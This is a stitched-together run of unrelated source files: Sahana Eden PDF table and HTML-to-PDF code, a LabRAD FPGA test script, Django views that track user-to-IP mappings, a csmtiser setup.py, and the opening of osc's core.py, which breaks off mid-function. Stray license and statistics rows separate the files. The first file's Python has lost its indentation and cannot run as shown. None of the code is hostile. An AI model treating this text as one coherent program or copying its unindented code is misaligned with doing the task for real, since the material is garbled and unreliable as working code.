data = newData
newData = []
self.list_fields = list_fields
return data
# -------------------------------------------------------------------------
def presentation(self):
"""
This will convert the S3PDFTABLE object to a format that can be
used to add to a S3PDF document object.
This is only used internally but could be used to generate a copy
of a previously generated table
"""
# Build the tables
content = []
currentPage = 0
totalPagesAcross = len(self.newColWidth)
if self.autogrow == "H" or self.autogrow == "B":
printable_width = self.pdf.printable_width
# Expand the columns to use all the available space
newColWidth = []
for cols in self.newColWidth:
col_width = 0
for col in cols:
col_width += col
if col_width < printable_width:
surplus = printable_width - col_width
proportion = surplus / col_width
newcols = []
for col in cols:
newcols.append(col + col * proportion)
newColWidth.append(newcols)
self.newColWidth = newColWidth
startRow = 0
for page in self.pages:
if page == []:
currentPage += 1
continue
colWidths = self.newColWidth[currentPage % totalPagesAcross]
if self.autogrow == "V" or self.autogrow == "B":
row_height = self.rowHeights[0][0]
rows = len(page)
if self.body_height > row_height * rows:
rowCnt = int(self.body_height / row_height)
extra_rows = rowCnt - rows
if extra_rows:
cells = len(colWidths)
row = [""] * cells
extra = [row] * extra_rows
page = page + extra
endCol = len(colWidths) - 1
rowCnt = len(page)
self.style = self.tableStyle(startRow, rowCnt, endCol)
(page, self.style) = self.pdf.addCellStyling(page, self.style)
p = Table(page, repeatRows=1,
style=self.style,
hAlign="LEFT",
colWidths=colWidths,
emptyTableAction="indicate"
)
content.append(p)
# Add a page break, except for the last page.
if currentPage + 1 < len(self.pages):
content.append(PageBreak())
currentPage += 1
if currentPage % totalPagesAcross == 0:
startRow += rowCnt - 1 # Don't include the heading
return content
# -------------------------------------------------------------------------
def getAvailableMarginSpace(self):
"""
Internally used method to calculate the amount of space available
on the width of a page.
"""
_pdf = self.pdf
availableMarginSpace = _pdf.leftMargin \
+ _pdf.rightMargin \
- 2 * _pdf.MINIMUM_MARGIN_SIZE
return availableMarginSpace
# -------------------------------------------------------------------------
def tweakMargin(self, tableWidth):
"""
Internally used method to adjust the document margins so that the
table will fit into the available space
"""
availableMarginSpace = self.getAvailableMarginSpace()
currentOverlap = tableWidth - self.tempDoc.printable_width
endCol = len(self.labels) - 1
rowCnt = len(self.data)
# Check margins
if currentOverlap < availableMarginSpace:
_pdf = self.pdf
_pdf.leftMargin -= currentOverlap / 2
_pdf.rightMargin -= currentOverlap / 2
return True
return False
# -------------------------------------------------------------------------
def tweakFont(self, tableWidth, newFontSize, colWidths):
"""
Internally used method to adjust the font size used so that the
table will fit into the available space on the page.
"""
# Check font
adjustedWidth = tableWidth * newFontSize / self.fontsize
if (adjustedWidth - self.tempDoc.printable_width) < self.getAvailableMarginSpace():
for i in range(len(colWidths)):
colWidths[i] *= float(newFontSize) / float(self.fontsize)
self.newColWidth = [colWidths]
self.fontsize = newFontSize
return self.tweakMargin(adjustedWidth)
return False
# -------------------------------------------------------------------------
def minorTweaks(self, tableWidth, colWidths):
"""
Internally used method to tweak the formatting so that the table
will fit into the available space on the page.
"""
if self.tweakMargin(tableWidth):
return True
originalFont = self.fontsize
if self.tweakFont(tableWidth, originalFont -1, colWidths):
return True
if self.tweakFont(tableWidth, originalFont -2, colWidths):
return True
if self.tweakFont(tableWidth, originalFont -3, colWidths):
return True
return False
# -------------------------------------------------------------------------
def tweakDoc(self, table):
"""
Internally used method to adjust the table so that it will fit
into the available space on the page.
@return: True if it is able to perform minor adjustments and have
the table fit in the page. False means that the table will need to
be split across the columns.
"""
tableWidth = 0
for colWidth in table._colWidths:
tableWidth += colWidth
colWidths = table._colWidths
#print "Doc size %s x %s Table width %s" % (self.tempDoc.printable_width, self.tempDoc.height, total)
if tableWidth > self.tempDoc.printable_width:
# self.pdf.setMargins(0.5*inch, 0.5*inch)
# First massage any comment column by putting it in a paragraph
colNo = 0
for label in self.labels:
# Wrap comments in a paragraph
if label.lower() == "comments":
currentWidth = table._colWidths[colNo]
# print "%s %s" % (colNo, currentWidth)
if currentWidth > self.MIN_COMMENT_COL_WIDTH:
for i in range(1, len(self.data)): # skip the heading
try:
comments = self.data[i][colNo]
if comments:
comments = self.pdf.addParagraph(comments, append=False)
self.data[i][colNo] = comments
except IndexError:
pass
colWidths[colNo] = self.MIN_COMMENT_COL_WIDTH
tableWidth += self.MIN_COMMENT_COL_WIDTH - currentWidth
colNo += 1
if not self.minorTweaks(tableWidth, colWidths):
self.tempDoc.defaultPage = "Landscape"
self.tempDoc._calc()
self.pdf.defaultPage = "Landscape"
self.pdf._calc()
return self.minorTweaks(tableWidth, colWidths)
return True
# -------------------------------------------------------------------------
def splitTable(self, tempTable):
"""
Internally used method to split the table across columns so that it
will fit into the available space on the page.
"""
colWidths = tempTable._colWidths
rowHeights = tempTable._rowHeights
total = 0
colNo = 0
colSplit = []
newColWidth = []
pageColWidth = []
for colW in colWidths:
if colNo > 0 and total + colW > self.tempDoc.printable_width:
# Split before this column...
colSplit.append(colNo)
newColWidth.append(pageColWidth)
# ...and put it on a new page
pageColWidth = [colW]
total = colW
else:
# Append this column to the current page
pageColWidth.append(colW)
total += colW
colNo += 1
colSplit.append(len(colWidths))
newColWidth.append(pageColWidth)
self.newColWidth = newColWidth
total = 0
rowNo = 0
lastKnownHeight = 20 # Not all row heights get calculated.
rowSplit = []
for rowH in rowHeights:
if rowH == None:
rowH = lastKnownHeight
else:
lastKnownHeight = rowH
if total + rowH > self.body_height:
rowSplit.append(rowNo)
total = 2 * rowH # 2* is needed to take into account the repeated header row
else:
total += rowH
rowNo += 1
rowSplit.append(rowNo)
# Build the pages of data
pages = []
startRow = 1 # Skip the first row (the heading) because we'll generate our own
for endRow in rowSplit:
startCol = 0
for endCol in colSplit:
page = []
pappend = page.append
label = []
lappend = label.append
for colIndex in range(startCol, endCol):
try:
lappend(self.labels[colIndex])
except IndexError:
lappend("")
pappend(label)
for rowIndex in range(startRow, endRow):
line = []
lappend = line.append
for colIndex in range(startCol, endCol):
try:
lappend(self.data[rowIndex][colIndex])
except IndexError: # No data to add.
# If this is the first column of a subheading row then repeat the subheading
if len(line) == 0 and rowIndex in self.subheadingList:
try:
lappend(self.data[rowIndex][0])
except IndexError:
lappend("")
else:
lappend("")
pappend(line)
pages.append(page)
startCol = endCol
startRow = endRow
return pages
# -------------------------------------------------------------------------
def tableStyle(self, startRow, rowCnt, endCol, colour_required=False):
"""
Internally used method to assign a style to the table
@param startRow: The row from the data that the first data row in
the table refers to. When a table is split the first row in the
table (ignoring the label header row) will not always be the first row
in the data. This is needed to align the two. Currently this parameter
is used to identify sub headings and give them an emphasised styling
@param rowCnt: The number of rows in the table
@param endCol: The last column in the table
@todo: replace endCol with -1
(should work but need to test with a split table)
"""
font_name_bold = self.font_name_bold
style = [("FONTNAME", (0, 0), (-1, -1), self.font_name),
("FONTSIZE", (0, 0), (-1, -1), self.fontsize),
("VALIGN", (0, 0), (-1, -1), "TOP"),
("LINEBELOW", (0, 0), (endCol, 0), 1, Color(0, 0, 0)),
("FONTNAME", (0, 0), (endCol, 0), font_name_bold),
]
sappend = style.append
if colour_required:
sappend(("BACKGROUND", (0, 0), (endCol, 0), self.headerColour))
else:
sappend(("BACKGROUND", (0, 0), (-1, 0), colors.lightgrey))
sappend(("INNERGRID", (0, 0), (-1, -1), 0.2, colors.lightgrey))
if self.pdf_groupby != None:
sappend(("LEFTPADDING", (0, 0), (-1, -1), 20))
rowColourCnt = 0 # used to alternate the colours correctly when we have subheadings
for i in range(rowCnt):
# If subheading
if startRow + i in self.subheadingList:
level = self.subheadingLevel[startRow + i]
if colour_required:
sappend(("BACKGROUND", (0, i), (endCol, i),
self.headerColour))
sappend(("FONTNAME", (0, i), (endCol, i), font_name_bold))
sappend(("SPAN", (0, i), (endCol, i)))
sappend(("LEFTPADDING", (0, i), (endCol, i), 6 * level))
elif i > 0:
if colour_required:
if rowColourCnt % 2 == 0:
sappend(("BACKGROUND", (0, i), (endCol, i),
self.evenColour))
rowColourCnt += 1
else:
sappend(("BACKGROUND", (0, i), (endCol, i),
self.oddColour))
rowColourCnt += 1
sappend(("BOX", (0, 0), (-1, -1), 1, Color(0, 0, 0)))
return style
# =============================================================================
class S3html2pdf():
"""
Class that takes HTML in the form of web2py helper objects
and converts it to PDF
"""
def __init__(self,
pageWidth,
exclude_class_list = []):
"""
@param pageWidth:
@param exclude_class_list:
"""
# Fonts
set_fonts(self)
self.exclude_class_list = exclude_class_list
self.pageWidth = pageWidth
self.fontsize = 10
styleSheet = getSampleStyleSheet()
self.plainstyle = styleSheet["Normal"]
self.plainstyle.fontName = self.font_name
self.plainstyle.fontSize = 9
self.boldstyle = deepcopy(styleSheet["Normal"])
self.boldstyle.fontName = self.font_name_bold
self.boldstyle.fontSize = 10
self.titlestyle = deepcopy(styleSheet["Normal"])
self.titlestyle.fontName = self.font_name_bold
self.titlestyle.fontSize = 16
self.normalstyle = self.plainstyle
# To add more PDF styles define the style above (just like the titlestyle)
# Then add the style and the name to the lookup dict below
# These can then be added to the html in the code as follows:
# TD("Waybill", _class="pdf_title")
self.style_lookup = {"pdf_title": self.titlestyle}
# -------------------------------------------------------------------------
def parse(self, html):
"""
Entry point for class
"""
result = self.select_tag(html)
return result
# -------------------------------------------------------------------------
def select_tag(self, html, title=False):
"""
"""
if self.exclude_tag(html):
return None
if isinstance(html, TABLE):
return self.parse_table(html)
elif isinstance(html, A):
return self.parse_a(html)
elif isinstance(html, P):
return self.parse_p(html)
elif isinstance(html, IMG):
return S3html2pdf.parse_img(html)
elif isinstance(html, DIV):
return self.parse_div(html)
elif (isinstance(html, basestring) or isinstance(html, lazyT)):
if title:
para = [Paragraph(s3_unicode(html), self.boldstyle)]
else:
para = [Paragraph(s3_unicode(html), self.normalstyle)]
self.normalstyle = self.plainstyle
return para
return None
# -------------------------------------------------------------------------
def exclude_tag(self, html):
"""
"""
try:
if html.attributes["_class"] in self.exclude_class_list:
return True
if html.attributes["_class"] in self.style_lookup:
self.normalstyle = self.style_lookup[html.attributes["_class"]]
except:
pass
return False
# -------------------------------------------------------------------------
def parse_div(self, html):
"""
Parses a DIV element and converts it into a format for ReportLab
@param html: the DIV element to convert
@return: a list containing text that ReportLab can use
"""
content = []
select_tag = self.select_tag
for component in html.components:
result = select_tag(component)
if result != None:
content += result
if content == []:
return None
return content
# -------------------------------------------------------------------------
def parse_a(self, html):
"""
Parses an A element and converts it into a format for ReportLab
@param html: the A element to convert
@return: a list containing text that ReportLab can use
"""
content = []
select_tag = self.select_tag
for component in html.components:
result = select_tag(component)
if result != None:
content += result
if content == []:
return None
return content
# -------------------------------------------------------------------------
@staticmethod
def parse_img(html, uploadfolder=None):
"""
Parses an IMG element and converts it into an Image for ReportLab
@param html: the IMG element to convert
@param uploadfolder: an optional uploadfolder in which to find the file
@return: a list containing an Image that ReportLab can use
@note: The `src` attribute of the image must either
point to a static resource, directly to a file, or to an upload.
"""
from reportlab.platypus import Image
I = None
sep = os.path.sep
if "_src" in html.attributes:
src = html.attributes["_src"]
root_dir = "%s%s%s" % (sep, current.request.application, sep)
if uploadfolder:
src = src.rsplit("/", 1) # Don't use os.sep here
src = os.path.join(uploadfolder, src[1])
elif src.startswith("%sstatic" % root_dir):
src = src.split(root_dir)[-1]
src = os.path.join(current.request.folder, src)
else:
src = src.rsplit("/", 1) # Don't use os.sep here
src = os.path.join(current.request.folder,
"uploads%s" % sep, src[1])
if os.path.exists(src):
I = Image(src)
if not I:
return None
iwidth = I.drawWidth
iheight = I.drawHeight
# @todo: extract the number from a 60px value
# if "_height" in html.attributes:
# height = int(html.attributes["_height"]) * inch / 80.0
# width = iwidth * (height / iheight)
# elif "_width" in html.attributes:
# width = int(html.attributes["_width"]) * inch / 80.0
# height = iheight * (width / iwidth)
# else:
# height = 1.0 * inch
# width = iwidth * (height / iheight)
height = 1.0 * inch
width = iwidth * (height / iheight)
I.drawHeight = height
I.drawWidth = width
return [I]
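    # A minimal usage sketch (assumes the application is named "myapp" and that the
    # referenced file exists under its static folder):
    #   flowables = S3html2pdf.parse_img(IMG(_src="/myapp/static/img/blank.png"))
    #   if flowables:
    #       image = flowables[0]   # a reportlab Image scaled to 1 inch in height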
# -------------------------------------------------------------------------
def parse_p(self, html):
"""
Parses a P element and converts it into a format for ReportLab
@param html: the P element to convert
@return: a list containing text that ReportLab can use
"""
content = []
select_tag = self.select_tag
for component in html.components:
result = select_tag(component)
if result != None:
content += result
if content == []:
return None
return content
# -------------------------------------------------------------------------
def parse_table(self, html):
"""
Parses a TABLE element and converts it into a format for ReportLab
@param html: the TABLE element to convert
@return: a list containing text that ReportLab can use
"""
style = [("FONTSIZE", (0, 0), (-1, -1), self.fontsize),
("VALIGN", (0, 0), (-1, -1), "TOP"),
("FONTNAME", (0, 0), (-1, -1), self.font_name),
("GRID", (0, 0), (-1, -1), 0.5, colors.grey),
]
content = []
cappend = content.append
rowCnt = 0
result = None
exclude_tag = self.exclude_tag
parse_tr = self.parse_tr
for component in html.components:
if exclude_tag(component):
continue
if isinstance(component, TR):
result = parse_tr(component, style, rowCnt)
rowCnt += 1
if result != None:
cappend(result)
if content == []:
return None
table = Table(content,
style=style,
hAlign="LEFT",
vAlign="Top",
)
cw = table._colWidths
return [table]
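    # A minimal usage sketch with web2py helpers (the parser walks the DOM tree and
    # returns a list of ReportLab flowables):
    #   parser = S3html2pdf(pageWidth=500)
    #   flowables = parser.parse(TABLE(TR(TH("Name"), TH("Role")),
    #                                  TR(TD("Alice"), TD("Manager"))))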
# -------------------------------------------------------------------------
def parse_tr (self, html, style, rowCnt):
"""
Parses a TR element and converts it into a format for ReportLab
@param html: the TR element to convert
@return: a list containing text that ReportLab can use
"""
row = []
rappend = row.append
sappend = style.append
colCnt = 0
exclude_tag = self.exclude_tag
select_tag = self.select_tag
font_name_bold = self.font_name_bold
for component in html.components:
if isinstance(component, (TH, TD)):
if exclude_tag(component):
continue
colspan = component.attributes.get("_colspan", 1)
if component.components == []:
rappend("")
else:
for detail in component.components:
result = select_tag(detail, title=isinstance(component, TH))
if result != None:
rappend(result)
if isinstance(component, TH):
sappend(("BACKGROUND", (colCnt, rowCnt), (colCnt, rowCnt), colors.lightgrey))
sappend(("FONTNAME", (colCnt, rowCnt), (colCnt, rowCnt), font_name_bold))
if colspan > 1:
for i in xrange(1, colspan):
rappend("")
sappend(("SPAN", (colCnt, rowCnt), (colCnt + colspan - 1, rowCnt)))
colCnt += colspan
else:
colCnt += 1
if row == []:
return None
return row
# END =========================================================================
| mit | -3,412,044,667,830,531,600 | 38.348821 | 123 | 0.482649 | false |
McDermott-Group/LabRAD | LabRAD/TestScripts/fpgaTest/conf.py | 1 | 1676 | import os
if __file__ in [f for f in os.listdir('.') if os.path.isfile(f)]:
# This is executed when the script is loaded by the labradnode.
SCRIPT_PATH = os.path.dirname(os.getcwd())
else:
# This is executed if the script is started by clicking or
# from a command line.
SCRIPT_PATH = os.path.dirname(__file__)
LABRAD_PATH = os.path.join(SCRIPT_PATH.rsplit('LabRAD', 1)[0])
import sys
if LABRAD_PATH not in sys.path:
sys.path.append(LABRAD_PATH)
import labrad
from LabRAD.TestScripts.fpgaTest.pyle.pyle.workflow import switchSession as pss #(P)yle(S)witch(S)ession
from LabRAD.TestScripts.fpgaTest.pyle.pyle.util import sweeptools as st
import fpgaTest
def switchSession(session=None, user=None):
"""Switch the current session, using the global connection object."""
global s
if user is None:
user = s._dir[1]
s = pss(cxn, user, session, useDataVault=False)
# connect to labrad and setup a wrapper for the current sample
cxn = labrad.connect()
switchSession(user='TestUser')
fpga = cxn.ghz_fpgas
# print(str(fpgaTest.daisyCheck(s, cxn, 10, 10, True)))
#fpgaTest.dacSignal(s, fpga)
#fpgaTest.runAverage(s, fpga, plot=True)
fpgaTest.average(s, cxn, 60, plot=True, save=False)
#fpgaTest.sumCheck(s, cxn, plot=True, save=False)
#fpgaTest.spectrum(s, cxn, plot=True, save=False)
#fpgaTest.sideband(s, cxn, plot=True, save=False)
# fpgaTest.filterCompare(s, cxn, [('square', 0), ('hann', 0),
# ('gaussian', 10)], plot=True, save=False)
#fpgaTest.phase(s, cxn, 'DAC', dacAmp=0.25, plot=True, save=False)
#fpgaTest.dacAmpToAdcAverage(s, cxn, plot=True, save=False)
#fpgaTest.adcAmpToVoltage(s, cxn, plot=True, save=False) | gpl-2.0 | -6,430,066,248,594,097,000 | 37.113636 | 104 | 0.711217 | false |
PGower/PNS | pns_web/endpoint/views.py | 1 | 4796 | from endpoint.models import Mapping, Fullname
from django.shortcuts import render, get_object_or_404
from rest_framework.views import APIView
from rest_framework.response import Response
from rest_framework.exceptions import APIException
from rest_framework import viewsets
from endpoint.serializers import MappingSerializer, FullnameSerializer
from haystack.query import SearchQuerySet
import logging
logger = logging.getLogger(__name__)
# API Views
class MappingAction(APIView):
'''
Generic API endpoint for the login/update/logout actions.
'''
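    # Illustrative request body (the exact field set depends on the Mapping
    # serializer; "ip_address" here is an assumption based on the other views):
    #   POST {"action": "login", "username": "jdoe", "fullname": "Jane Doe",
    #         "ip_address": "10.0.0.5"}
    # Every action first expires the user's previous mappings; "logout" then
    # saves the new record already expired, other actions save it active.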
def post(self, request, format=None):
try:
            action = request.data['action']
            username = request.data['username']
        except KeyError:
            raise APIException('An action and username are required')
# Update the Fullname mapping
Fullname.objects.update_or_create(username=username, defaults={
'username': username,
'fullname': request.data.get('fullname', '')
})
logger.debug(request.data.get('fullname'))
# Expire any existing records for this user
Mapping.objects.filter(username=username).filter(expired=False).update(expired=True)
new_mapping_serializer = MappingSerializer(data=request.data)
if new_mapping_serializer.is_valid():
if action == 'logout':
r = new_mapping_serializer.save(expired=True)
else:
new_mapping_serializer.save()
return Response('success')
else:
return Response(new_mapping_serializer.errors)
class InfoForGeneric(APIView):
    '''Base class shared by the InfoForUser and InfoForAddress views below.'''
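    # Sketch of the JSON shape produced by get() below (values illustrative):
    #   {"current": <serialized mapping or null>,
    #    "history": <list of older serialized mappings, newest first, or null>,
    #    "errors": [<warning strings>]}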
def query(self, term, expired):
        raise NotImplementedError
def get(self, request):
errors = []
response = {}
term = request.query_params.get('term')
try:
current = self.query(term, False).get()
except Mapping.MultipleObjectsReturned:
current = self.query(term, False).order_by('-created')[0]
            errors.append('More than one address mapping was returned as the current mapping. The latest one is being used.')
except Mapping.DoesNotExist:
current = None
errors.append('There is currently no active mapping for {}.'.format(term))
finally:
if current is not None:
serialized_current = MappingSerializer(current)
response['current'] = serialized_current.data
else:
response['current'] = None
history = self.query(term, True).order_by('-created')
if len(history) > 0:
serialized_history = MappingSerializer(history, many=True)
response['history'] = serialized_history.data
else:
errors.append('There does not appear to be any history for {}'.format(term))
response['history'] = None
response['errors'] = errors
return Response(response)
class InfoForUser(InfoForGeneric):
'''
Return information about the username.
'''
def query(self, term, expired):
return Mapping.objects.filter(username=term).filter(expired=expired)
class InfoForAddress(InfoForGeneric):
'''
Return information about an IP address.
'''
def query(self, term, expired):
return Mapping.objects.filter(ip_address=term).filter(expired=expired)
class NameSearch(APIView):
'''
Given part of a name perform a full text search and find the username
'''
def get(self, request):
# import pdb;pdb.set_trace()
q = request.query_params.get('q')
if q == '!!preload':
results = Fullname.objects.all()
results = FullnameSerializer(results, many=True)
return Response({'results': results.data})
else:
query = SearchQuerySet().autocomplete(text=q)
results = query.load_all()
results = FullnameSerializer(results, many=True)
return Response({'results': results.data})
class RealtimeUpdates(APIView):
'''
Return all new mappings since the last call
'''
def get(self, request, last_id=None):
if last_id is None:
results = Mapping.objects.order_by('-created')[:20]
else:
results = Mapping.objects.filter(pk__gt=last_id)
if results.count() > 0:
last_id = results[0].pk
results = MappingSerializer(results, many=True)
response = {'results': results.data, 'last_id': last_id}
return Response(response)
# Actual Pages
def dashboard_page(request):
return render(request, 'index.html.j2', {})
| gpl-2.0 | 6,975,290,168,174,774,000 | 34.007299 | 125 | 0.617389 | false |
clarinsi/csmtiser | setup.py | 1 | 1140 | import os
from setuptools import setup
with open(os.path.join(os.path.dirname(__file__), 'README.md')) as readme:
README = readme.read()
# allow setup.py to be run from any path
os.chdir(os.path.normpath(os.path.join(os.path.abspath(__file__), os.pardir)))
setup(
name='csmtiser',
version='0.0.1',
packages=['csmtiser'],
include_package_data=True,
license='MIT License',
description='A tool for text normalisation via character-level machine translation',
long_description=README,
url='https://github.com/clarinsi/csmtiser',
author='Matic Perovsek',
author_email='[email protected]',
classifiers=[
'Development Status :: 2 - Pre-Alpha',
'Intended Audience :: Developers',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Topic :: Internet :: WWW/HTTP',
'Topic :: Internet :: WWW/HTTP :: Dynamic Content',
'Topic :: Scientific/Engineering :: Artificial Intelligence',
'Topic :: Software Development :: Libraries'
],
install_requires=[
]
)
| lgpl-3.0 | 3,668,026,125,777,071,600 | 32.529412 | 88 | 0.642982 | false |
DimStar77/osc | osc/core.py | 1 | 290542 | # Copyright (C) 2006 Novell Inc. All rights reserved.
# This program is free software; it may be used, copied, modified
# and distributed under the terms of the GNU General Public Licence,
# either version 2, or version 3 (at your option).
from __future__ import print_function
__version__ = '0.159git'
# __store_version__ is to be incremented when the format of the working copy
# "store" changes in an incompatible way. Please add any needed migration
# functionality to check_store_version().
__store_version__ = '1.0'
import locale
import os
import os.path
import sys
import shutil
import subprocess
import re
import socket
import errno
import shlex
try:
from urllib.parse import urlsplit, urlunsplit, urlparse, quote_plus, urlencode, unquote
from urllib.error import HTTPError
from urllib.request import pathname2url, install_opener, urlopen
from urllib.request import Request as URLRequest
from io import StringIO
except ImportError:
#python 2.x
from urlparse import urlsplit, urlunsplit, urlparse
from urllib import pathname2url, quote_plus, urlencode, unquote
from urllib2 import HTTPError, install_opener, urlopen
from urllib2 import Request as URLRequest
from cStringIO import StringIO
try:
from xml.etree import cElementTree as ET
except ImportError:
import cElementTree as ET
from . import oscerr
from . import conf
try:
# python 2.6 and python 2.7
unicode
ET_ENCODING = "utf-8"
# python 2.6 does not have bytes and python 2.7 reimplements it as alias to
# str, but in incompatible way as it does not accept the same arguments
bytes = lambda x, *args: x
except:
#python3 does not have unicode, so lets reimplement it
#as void function as it already gets unicode strings
unicode = lambda x, *args: x
ET_ENCODING = "unicode"
DISTURL_RE = re.compile(r"^(?P<bs>.*)://(?P<apiurl>.*?)/(?P<project>.*?)/(?P<repository>.*?)/(?P<revision>.*)-(?P<source>.*)$")
BUILDLOGURL_RE = re.compile(r"^(?P<apiurl>https?://.*?)/build/(?P<project>.*?)/(?P<repository>.*?)/(?P<arch>.*?)/(?P<package>.*?)/_log$")
BUFSIZE = 1024*1024
store = '.osc'
new_project_templ = """\
<project name="%(name)s">
<title></title> <!-- Short title of NewProject -->
<description></description>
<!-- This is for a longer description of the purpose of the project -->
<person role="maintainer" userid="%(user)s" />
<person role="bugowner" userid="%(user)s" />
<!-- remove this block to publish your packages on the mirrors -->
<publish>
<disable />
</publish>
<build>
<enable />
</build>
<debuginfo>
<enable />
</debuginfo>
<!-- remove this comment to enable one or more build targets
<repository name="openSUSE_Factory">
<path project="openSUSE:Factory" repository="snapshot" />
<arch>x86_64</arch>
<arch>i586</arch>
</repository>
<repository name="openSUSE_13.2">
<path project="openSUSE:13.2" repository="standard"/>
<arch>x86_64</arch>
<arch>i586</arch>
</repository>
<repository name="openSUSE_13.1">
<path project="openSUSE:13.1" repository="standard"/>
<arch>x86_64</arch>
<arch>i586</arch>
</repository>
<repository name="Fedora_21">
<path project="Fedora:21" repository="standard" />
<arch>x86_64</arch>
<arch>i586</arch>
</repository>
<repository name="SLE_12">
<path project="SUSE:SLE-12:GA" repository="standard" />
<arch>x86_64</arch>
<arch>i586</arch>
</repository>
-->
</project>
"""
new_package_templ = """\
<package name="%(name)s">
<title></title> <!-- Title of package -->
<description></description> <!-- for long description -->
<!-- following roles are inherited from the parent project
<person role="maintainer" userid="%(user)s"/>
<person role="bugowner" userid="%(user)s"/>
-->
<!--
<url>PUT_UPSTREAM_URL_HERE</url>
-->
<!--
use one of the examples below to disable building of this package
on a certain architecture, in a certain repository,
or a combination thereof:
<disable arch="x86_64"/>
<disable repository="SUSE_SLE-10"/>
<disable repository="SUSE_SLE-10" arch="x86_64"/>
Possible sections where you can use the tags above:
<build>
</build>
<debuginfo>
</debuginfo>
<publish>
</publish>
<useforbuild>
</useforbuild>
Please have a look at:
http://en.opensuse.org/Restricted_formats
Packages containing formats listed there are NOT allowed to
be packaged in the openSUSE Buildservice and will be deleted!
-->
</package>
"""
new_attribute_templ = """\
<attributes>
<attribute namespace="" name="">
<value><value>
</attribute>
</attributes>
"""
new_user_template = """\
<person>
<login>%(user)s</login>
<email>PUT_EMAIL_ADDRESS_HERE</email>
<realname>PUT_REAL_NAME_HERE</realname>
<watchlist>
<project name="home:%(user)s"/>
</watchlist>
</person>
"""
new_group_template = """\
<group>
<title>%(group)s</title>
<person>
<person userid=""/>
</person>
</group>
"""
info_templ = """\
Project name: %s
Package name: %s
Path: %s
API URL: %s
Source URL: %s
srcmd5: %s
Revision: %s
Link info: %s
"""
new_pattern_template = """\
<!-- See https://github.com/openSUSE/libzypp/tree/master/zypp/parser/yum/schema/patterns.rng -->
<!--
<pattern xmlns="http://novell.com/package/metadata/suse/pattern"
xmlns:rpm="http://linux.duke.edu/metadata/rpm">
<name></name>
<summary></summary>
<description></description>
<uservisible/>
<category lang="en"></category>
<rpm:requires>
<rpm:entry name="must-have-package"/>
</rpm:requires>
<rpm:recommends>
<rpm:entry name="package"/>
</rpm:recommends>
<rpm:suggests>
<rpm:entry name="anotherpackage"/>
</rpm:suggests>
</pattern>
-->
"""
buildstatus_symbols = {'succeeded': '.',
'disabled': ' ',
'expansion error': 'U', # obsolete with OBS 2.0
'unresolvable': 'U',
'failed': 'F',
'broken': 'B',
'blocked': 'b',
'building': '%',
'finished': 'f',
'scheduled': 's',
'locked': 'L',
'excluded': 'x',
'dispatching': 'd',
'signing': 'S',
}
# os.path.samefile is available only under Unix
def os_path_samefile(path1, path2):
try:
return os.path.samefile(path1, path2)
except:
return os.path.realpath(path1) == os.path.realpath(path2)
class File:
"""represent a file, including its metadata"""
def __init__(self, name, md5, size, mtime, skipped=False):
self.name = name
self.md5 = md5
self.size = size
self.mtime = mtime
self.skipped = skipped
def __repr__(self):
return self.name
def __str__(self):
return self.name
class Serviceinfo:
"""Source service content
"""
def __init__(self):
"""creates an empty serviceinfo instance"""
self.services = []
self.apiurl = None
self.project = None
self.package = None
def read(self, serviceinfo_node, append=False):
"""read in the source services <services> element passed as
elementtree node.
"""
def error(msg, xml):
data = 'invalid service format:\n%s' % ET.tostring(xml, encoding=ET_ENCODING)
raise ValueError("%s\n\n%s" % (data, msg))
if serviceinfo_node is None:
return
if not append:
self.services = []
services = serviceinfo_node.findall('service')
for service in services:
name = service.get('name')
if len(name) < 3 or '/' in name:
error("invalid service name: %s" % name, service)
mode = service.get('mode', '')
data = { 'name' : name, 'mode' : mode }
command = [ name ]
for param in service.findall('param'):
option = param.get('name')
if option is None:
error("%s: a parameter requires a name" % name, service)
value = ''
if param.text:
value = param.text
command.append('--' + option)
# hmm is this reasonable or do we want to allow real
# options (e.g., "--force" (without an argument)) as well?
command.append(value)
data['command'] = command
self.services.append(data)
def getProjectGlobalServices(self, apiurl, project, package):
self.apiurl = apiurl
# get all project wide services in one file, we don't store it yet
u = makeurl(apiurl, ['source', project, package], query='cmd=getprojectservices')
try:
f = http_POST(u)
root = ET.parse(f).getroot()
self.read(root, True)
self.project = project
self.package = package
except HTTPError as e:
if e.code == 404 and package != '_project':
self.getProjectGlobalServices(apiurl, project, '_project')
self.package = package
elif e.code != 403 and e.code != 400:
raise e
def addVerifyFile(self, serviceinfo_node, filename):
import hashlib
        # open in binary mode: hashlib needs bytes (also works under Python 2)
        f = open(filename, 'rb')
digest = hashlib.sha256(f.read()).hexdigest()
f.close()
r = serviceinfo_node
s = ET.Element( "service", name="verify_file" )
ET.SubElement(s, "param", name="file").text = filename
ET.SubElement(s, "param", name="verifier").text = "sha256"
ET.SubElement(s, "param", name="checksum").text = digest
r.append( s )
return r
def addDownloadUrl(self, serviceinfo_node, url_string):
url = urlparse( url_string )
protocol = url.scheme
host = url.netloc
path = url.path
r = serviceinfo_node
s = ET.Element( "service", name="download_url" )
ET.SubElement(s, "param", name="protocol").text = protocol
ET.SubElement(s, "param", name="host").text = host
ET.SubElement(s, "param", name="path").text = path
r.append( s )
return r
def addSetVersion(self, serviceinfo_node):
r = serviceinfo_node
s = ET.Element( "service", name="set_version", mode="buildtime" )
r.append( s )
return r
def addGitUrl(self, serviceinfo_node, url_string):
r = serviceinfo_node
s = ET.Element( "service", name="obs_scm" )
ET.SubElement(s, "param", name="url").text = url_string
ET.SubElement(s, "param", name="scm").text = "git"
r.append( s )
return r
def addTarUp(self, serviceinfo_node):
r = serviceinfo_node
s = ET.Element( "service", name="tar", mode="buildtime" )
r.append( s )
return r
def addRecompressTar(self, serviceinfo_node):
r = serviceinfo_node
s = ET.Element( "service", name="recompress", mode="buildtime" )
ET.SubElement(s, "param", name="file").text = "*.tar"
ET.SubElement(s, "param", name="compression").text = "xz"
r.append( s )
return r
def execute(self, dir, callmode = None, singleservice = None, verbose = None):
import tempfile
# cleanup existing generated files
for filename in os.listdir(dir):
if filename.startswith('_service:') or filename.startswith('_service_'):
ent = os.path.join(dir, filename)
if os.path.isdir(ent):
shutil.rmtree(ent)
else:
os.unlink(ent)
allservices = self.services or []
if singleservice and not singleservice in allservices:
# set array to the manual specified singleservice, if it is not part of _service file
data = { 'name' : singleservice, 'command' : [ singleservice ], 'mode' : '' }
allservices = [data]
# services can detect that they run via osc this way
os.putenv("OSC_VERSION", get_osc_version())
# set environment when using OBS 2.3 or later
if self.project != None:
# These need to be kept in sync with bs_service
os.putenv("OBS_SERVICE_APIURL", self.apiurl)
os.putenv("OBS_SERVICE_PROJECT", self.project)
